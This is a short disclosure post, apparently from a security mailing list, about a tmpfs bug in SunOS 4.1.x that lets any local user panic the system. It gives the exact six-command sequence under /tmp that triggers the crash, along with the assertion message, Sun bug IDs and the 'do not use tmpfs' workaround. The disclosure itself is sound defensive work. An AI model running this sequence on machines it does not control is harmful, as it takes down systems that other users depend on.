SunOS 4.1.3 and 4.1.4 tmpfs DoS

[demarest () ARRAYCOMM COM (Timothy Demarest)]

While searching SunSolve for a completely unrelated issue, I came across
two bug reports (1115820, 1111248) that describe a way for any user to
panic a system running SunOS 4.1.1, 4.1.3, 4.1.3_U1, and 4.1.4. While the
bugs have been reported to Sun, no patch is available. There is a simple
workaround, if you dont' require tmpfs.

I have never seen this reported, so it might be good to share this with a
wider audience. I don't want my users using this as a DoS against our older
servers.

Requirements:

 - The system must have /tmp mounted on swap (tmpfs)
 - /tmp must be writable by the UID that will crash the machine. Since tmp
   is frequently has full permissions (drwxrwxrwt), this is fairly common

How to panic the system:

cd /tmp
mkdir xx
cd xx
rmdir ../xx
touch yy
cd /

The system will then panic with "assertion failed: tp->tn_dir == NULL,
file: ../../tmpfs/tmp_tnode.c, line: 167" (from SunOS 4.1.4).

The workaround:

As specified in the bug reports, "do not use tmpfs."

I tested this only on SunOS 4.1.4 systems, but the bug reports list other
SunOS 4.1.x versions as well.

TIm

--
Timothy Demarest                      ArrayComm, Inc.
demarest () arraycomm com                3141 Zanker Road
http://www.arraycomm.com              San Jose, CA 95134